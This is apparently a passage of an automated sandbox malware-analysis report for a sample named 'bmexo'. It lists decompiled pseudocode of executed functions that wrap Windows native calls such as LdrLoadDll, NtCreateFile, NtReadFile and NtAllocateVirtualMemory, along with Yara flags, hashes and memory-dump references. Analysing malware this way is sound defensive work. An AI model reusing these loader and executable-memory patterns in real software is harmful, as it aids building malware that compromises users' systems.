PostThreadMessageW 61940->61941 61942 4076e0 61940->61942 61941->61942 61942->61863 61944 40d9e3 61943->61944 61950 419e40 61944->61950 61948 419d1c 61947->61948 61949 41af60 LdrLoadDll 61947->61949 61948->61871 61949->61948 61951 41af60 LdrLoadDll 61950->61951 61952 419e5c 61951->61952 61955 99fd8c LdrInitializeThunk 61952->61955 61953 40da0e 61953->61863 61955->61953 61956->61759 61958 419f79 61957->61958 61959 41af60 LdrLoadDll 61958->61959 61960 419f8c 61959->61960 61963 99ffb4 LdrInitializeThunk 61960->61963 61961 40d85e 61961->61765 61961->61766 61963->61961 61964->61771 61965->61776 61966->61781 61969 99f900 LdrInitializeThunk

                                          Executed Functions

                                          Function 0040A140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 225 40a140-40a169 call 41cdb0 228 40a16b-40a16e 225->228 229 40a16f-40a17d call 41d1d0 225->229 232 40a18d-40a19e call 41b500 229->232 233 40a17f-40a18a call 41d450 229->233 238 40a1a0-40a1b4 LdrLoadDll 232->238 239 40a1b7-40a1ba 232->239 233->232 238->239
                                          C-Code - Quality: 100%
                                          			E0040A140(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDB0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1D0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D450( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B500(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040a15c
                                          0x0040a15f
                                          0x0040a164
                                          0x0040a169
                                          0x0040a173
                                          0x0040a178
                                          0x0040a17b
                                          0x0040a17d
                                          0x0040a185
                                          0x0040a18a
                                          0x0040a18a
                                          0x0040a191
                                          0x0040a199
                                          0x0040a19c
                                          0x0040a19e
                                          0x0040a1b2
                                          0x00000000
                                          0x0040a1b4
                                          0x0040a1ba
                                          0x0040a16e
                                          0x0040a16e
                                          0x0040a16e

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1B2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction ID: dc890c527bf6af6b94e60bcd83cd2d34ae48ac36e0c5593c426351ed1e2082f7
                                          • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction Fuzzy Hash: 490112B5D4020DB7DF10DBA5DC42FDEB7789B54308F0441A6A908A7281F635EB54C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A30A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 240 41a30a-41a361 call 41af60 NtCreateFile
                                          C-Code - Quality: 64%
                                          			E0041A30A(void* __eax, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t25;

				asm("daa");
				_pop(_t35);
				_t19 = _a8;
				_t5 = _t19 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a8 + 0x14)), _t19, _t5,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x28);
				_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t25;
			}




                                          0x0041a30a
                                          0x0041a30d
                                          0x0041a313
                                          0x0041a31f
                                          0x0041a327
                                          0x0041a35d
                                          0x0041a361

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ec5c2006babe1b143ba46c5408079c29f07c10c96c76ec8253bf392964ae0bf9
                                          • Instruction ID: 22476ba4d21eacb1485a471025a5d994f2f22431d9c8235947b6ffffda91aae7
                                          • Opcode Fuzzy Hash: ec5c2006babe1b143ba46c5408079c29f07c10c96c76ec8253bf392964ae0bf9
                                          • Instruction Fuzzy Hash: 7A01B2B6201108AFDB08CF89DD84EDB37A9EF8C754F118209BA0D97245C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 243 41a310-41a326 244 41a32c-41a361 NtCreateFile 243->244 245 41a327 call 41af60 243->245 245->244
                                          C-Code - Quality: 100%
                                          			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                          0x0041a31f
                                          0x0041a327
                                          0x0041a35d
                                          0x0041a361

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                          • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                          • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                          • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A43A Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 246 41a43a-41a43c 247 41a40d-41a426 246->247 248 41a43e-41a456 246->248 251 41a42c-41a439 247->251 252 41a427 call 41af60 247->252 249 41a45c-41a469 NtClose 248->249 250 41a457 call 41af60 248->250 250->249 252->251
                                          C-Code - Quality: 62%
                                          			E0041A43A(void* __eax, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				long _v0;
				intOrPtr* __esi;
				void* __ebp;
				void* _t19;
				intOrPtr* _t20;
				void* _t22;

				if(__eflags >= 0) {
					_t10 = _a4;
					_t2 = _t10 + 0x14; // 0x56c29f0f
					_t3 = _t10 + 0xc68; // 0x409d7b
					_t20 = _t3;
					E0041AF60( *_t2, _a4, _t20,  *_t2, 0, 0x2b);
					return  *((intOrPtr*)( *_t20))(_a8, _t19, _t22);
				} else {
					__eflags = __eax;
					_push(__ebp);
					__ebp = __esp;
					__eax = _v0;
					_t6 = __eax + 0x14; // 0x56c29f0f
					__ecx =  *_t6;
					_t7 = __eax + 0xc6c; // 0x409d7f
					__esi = _t7;
					E0041AF60( *_t6, _v0, __esi,  *_t6, 0, 0x2c) =  *__esi;
					__eax = NtClose(_a4); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}









                                          0x0041a43c
                                          0x0041a413
                                          0x0041a416
                                          0x0041a41f
                                          0x0041a41f
                                          0x0041a427
                                          0x0041a439
                                          0x0041a43e
                                          0x0041a43e
                                          0x0041a43f
                                          0x0041a441
                                          0x0041a443
                                          0x0041a446
                                          0x0041a446
                                          0x0041a44f
                                          0x0041a44f
                                          0x0041a45f
                                          0x0041a465
                                          0x0041a467
                                          0x0041a468
                                          0x0041a469
                                          0x0041a469

                                          APIs
                                          • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: db8382feca8c007df7d05794e81be782f43ebc103989d7b0105d3190605e6f01
                                          • Instruction ID: 1e38f2064f271834fb41f04a2effb08a09c1e8cdcf796d71c443f5c73b541b47
                                          • Opcode Fuzzy Hash: db8382feca8c007df7d05794e81be782f43ebc103989d7b0105d3190605e6f01
                                          • Instruction Fuzzy Hash: 13F0F0761002046BCB10EBA8DC88DE77BA8EF44724F14829AF95C5B203C534E65587E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 254 41a3c0-41a409 call 41af60 NtReadFile
                                          C-Code - Quality: 37%
                                          			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                          0x0041a3c3
                                          0x0041a3cf
                                          0x0041a3d7
                                          0x0041a405
                                          0x0041a409

                                          APIs
                                          • NtReadFile.NTDLL(004159C2,5D9515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5D9515B3,004159C2,?,00000000), ref: 0041A405
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                          • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                          • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                          • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A4EA Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 41a4ea-41a52d call 41af60 NtAllocateVirtualMemory
                                          C-Code - Quality: 58%
                                          			E0041A4EA(signed int __esi, intOrPtr _a5, void* _a9, PVOID* _a13, long _a17, long* _a21, long _a25, long _a29) {
				long _t14;
				signed int _t22;

				_t22 = __esi | 0x0000004c;
				asm("daa");
				asm("rcl byte [ebp-0x75], 1");
				_t10 = _a5;
				_push(_t22);
				_t3 = _t10 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a5 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a5 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a9, _a13, _a17, _a21, _a25, _a29); // executed
				return _t14;
			}





                                          0x0041a4ea
                                          0x0041a4ed
                                          0x0041a4ef
                                          0x0041a4f3
                                          0x0041a4f9
                                          0x0041a4ff
                                          0x0041a507
                                          0x0041a529
                                          0x0041a52d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 7c5b439b8bc17e869c2cd1c2d8e37378e2c0988c2d98dffb62198324858ccf8c
                                          • Instruction ID: d5307538639919dc26bef951cf3138e465fd58974424f6e3b5853008a3f35d9d
                                          • Opcode Fuzzy Hash: 7c5b439b8bc17e869c2cd1c2d8e37378e2c0988c2d98dffb62198324858ccf8c
                                          • Instruction Fuzzy Hash: 81F08CB2610119AFDB14DF98DC81EEB7BA8EF8C354F118108FE0DA7241C630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 260 41a4f0-41a506 261 41a50c-41a52d NtAllocateVirtualMemory 260->261 262 41a507 call 41af60 260->262 262->261
                                          C-Code - Quality: 100%
                                          			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                          0x0041a4ff
                                          0x0041a507
                                          0x0041a529
                                          0x0041a52d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                          • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                          • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                          • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 272 41a440-41a469 call 41af60 NtClose
                                          C-Code - Quality: 100%
                                          			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d7f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                          0x0041a443
                                          0x0041a446
                                          0x0041a44f
                                          0x0041a457
                                          0x0041a465
                                          0x0041a469

                                          APIs
                                          • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                          • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                          • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                          • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A0048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A0078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009A07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
